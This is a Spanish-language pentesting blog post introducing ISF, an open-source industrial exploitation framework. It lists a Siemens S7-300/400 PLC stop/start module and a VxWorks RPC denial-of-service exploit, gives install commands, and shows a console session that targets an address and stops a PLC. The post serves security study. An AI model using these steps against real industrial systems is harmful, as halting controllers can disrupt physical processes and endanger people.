Pentesting and Security Personal Blog

Pentesting and Security Personal Blog

isf

Introducción al framework

ISF (Industrial Exploitation Framework), es un framework para exploiting de entornos industriales. El framework se basa en un proyecto de código abierto routersploit.

Aunque actualmente no tiene gran contenido sí es interesante tenerlo a mano en estos entornos y quizá ampliarlo nosotros mismos o esperar futuras actualizaciones.

Detalles

Cliente de protocolo IPC

Nombre Camino Descripción
Modbus_tcp_client Icssploit / clients / modbus_tcp_client.py Herramientas cliente Modbus-TCP

exploit scripts

| Name | Path | Description |
| ------------------------ | ------------------------ ------------------------------------------ |: ------ ---------------------------------: |
| S7_300_400_plc_control | icssploit / modules / exploits / plcs / siemens / s7_300_400_plc_control.py | S7-300 / 400 PLC Start and Stop Scripts |
Vxworks_rpc_dos | icssploit / modules / exploits / plcs / vxworks / vxworks_rpc_dos.py | Vxworks RPC Remote Denial of Service (CVE-2015-7599) |

Instalar

Dependencias de python

  • Gnureadline (sólo OSX)
  • Peticiones
  • Paramiko
  • Beautifulsoup4
  • Pysnmp
  • Scapy

Instalación en Kali2

git clone https://github.com/dark-lbp/isf/
cd isf
python isf.py

Uso

Ayuda

Exploits

Se puede usar TAB para completar los path

Opciones

Mostrar opciones

    Isf (S7-300 / 400 PLC Control)> show options

    Target options:

       Name Current settings Description
       ---- ---------------- -----------
       Target Target address acts 192.168.1.1
       Port 102 Target Port


    Module options:

       Name Current settings Description
       ---- ---------------- -----------
       Slot 2 CPU slot number.
       Command 1 Command 0: start plc, 1: stop plc.


    Isf (S7-300 / 400 PLC Control)

Poner los parámetros de las opciones

    Isf (S7-300 / 400 PLC Control)> set target 192.168.70.210
    [+] {'Target': '192.168.70.210'}

Ejecución

    Isf (S7-300 / 400 PLC Control)> run
    [*] Running module ...
    [+] Target is alive
    [*] Sending packet to target
    [*] Stop plc
    Isf (S7-300 / 400 PLC Control)

Mostrar información del módulo

    Isf (S7-300 / 400 PLC Control)> show info

    Name:
    S7-300 / 400 PLC Control

    Description:
    Use S7comm command to start / stop plc.

    Devices:
    - Siemens S7-300 and S7-400 programmable logic controllers (PLCs)

    Authors:
    - wenzhe zhu <jtrkid [at] gmail.com>

    References:

    Isf (S7-300 / 400 PLC Control)

Documentación

Podéis obtenerlo aquí:

github: https://github.com/dark-lbp/isf

¡Gracias por leer!

maninwire =D

Know your enemy!


Written by maninwire@gmail.com in Tools on mar 01 agosto 2017. Tags: exploit, tool, industrial, scada, framework,